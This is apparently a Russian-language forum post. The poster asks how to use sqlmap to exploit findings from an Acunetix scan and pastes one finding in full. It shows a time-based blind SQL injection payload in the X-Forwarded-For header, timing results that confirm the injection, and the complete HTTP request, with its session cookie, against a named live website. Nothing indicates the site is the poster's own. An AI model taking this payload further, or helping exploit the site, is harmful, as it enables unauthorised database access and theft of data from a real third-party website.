↑
Как эксплуатировать найденые уязвимости акунетикс в sqlmap?помогите разобраться
например это?
The vulnerability affects
https://site.com/product/11/HP-4250N...inter-LIKE-NEW
, X-Forwarded-For
Discovered by Blind SQL Injection
Attack Details
arrow_drop_up
HTTP Header input X-Forwarded-For was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Tests performed:
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 20.152
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.599
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.906
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.474
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.479
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.852
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.218
Original value: 3iv1i
HTTP Request
arrow_drop_up
GET /product/11/HP-4250N-LaserJet-Printer-LIKE-NEW HTTP/1.1
Referer:
https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Cookie: PHPSESSID=nfek80so1e2bn7p6st0503aro0
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: copyfaxes.com
Connection: Keep-alive